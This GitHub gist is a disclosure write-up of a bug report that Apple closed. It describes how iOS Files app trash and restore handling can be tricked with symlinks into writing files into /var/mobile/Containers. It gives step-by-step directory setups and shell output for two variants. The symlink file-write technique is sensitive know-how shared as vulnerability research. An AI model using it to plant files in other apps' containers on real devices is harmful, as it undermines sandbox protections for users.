Skip to content

Instantly share code, notes, and snippets.

@khanhduytran0

khanhduytran0/ArbWriteToContainers.md

Last active May 29, 2025 02:11
Show Gist options
  • Save khanhduytran0/8634698a1a5aa35596c8a7b8e70f5bbb to your computer and use it in GitHub Desktop.
Save khanhduytran0/8634698a1a5aa35596c8a7b8e70f5bbb to your computer and use it in GitHub Desktop.
Download ZIP
A closed report of arbitrary write to /var/mobile/Containers
Raw
ArbWriteToContainers.md

Note

Due to the sandbox of the affected app, it is only possible to write to /var/mobile/Containers, and you cannot overwrite file with this, hence Apple closed the report.

Timeline

March 11

@verygenericname told me he found an arbitrary write to /var/mobile/Containers, using the Files app, with the following steps:

  1. create a folder,
  2. put a file inside it,
  3. move the file to trash,
  4. replace the folder with a symlink anywhere in /var/mobile/Containers/,
  5. restore the file,
  6. congratulation

So let's say we have a directory structure like this:

Documents
├── .Trash
├── Folder
│   └── File.txt
└── Symlink -> /var/mobile/Containers

Open Files app and delete File.txt, it is moved to the hidden .Trash folder and the original path is recorded to an extended attribute com.apple.trash.putback

$ tree -a Documents
Documents
├── .Trash
│   └── File.txt
├── Folder
└── Symlink -> /var/mobile/Containers

3 directories, 1 file
$ xattr -l Documents/.Trash/File.txt 
com.apple.trash.putback#PS: bplist00?W/Folder

com.apple.trash.time#PS: bplist00?3A????

Now let's swap Folder with Symlink

$ mv Documents/Folder Documents/Folder_
$ mv Documents/Symlink Documents/Folder
$ tree -a Documents
Documents
├── .Trash
│   └── File.txt
├── Folder -> /var/mobile/Containers
└── Folder_

And now go to Files app, Recently Deleted and Recover File.txt that was previously deleted, and you'll get an error: image

Now let's go back to the Documents directory, you don't see File.txt anywhere, as it has been moved to the symlink destination!

$ tree -a Documents
Documents
├── .Trash
├── Folder -> /var/mobile/Containers
└── Folder_

3 directories, 0 files
$ ls -lah Documents/Folder/File.txt 
-rw-r--r-- 1 mobile mobile 0 May 29 07:26 Documents/Folder/File.txt

Sounds complicated, right? But I have found a simpler approach

May 12

I found that if I just make .Trash a symlink, deleting a file will directly move it to the desired location.

Let's setup your app's Documents directory like this:

Documents
├── .Trash -> /var/mobile/Containers
└── File.txt

All you need to do is go to Files app and delete File.txt, and you'll get a similar error image

Now let's check the result:

$ tree -a Documents
Documents
└── .Trash -> /var/mobile/Containers

1 directory, 0 files
$ ls -lah Documents/.Trash/File.txt
-rw-r--r-- 1 mobile mobile 0 May 29 07:26 Documents/.Trash/File.txt

May 29

Apple closed our report, concluding it wasn't a security issue.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment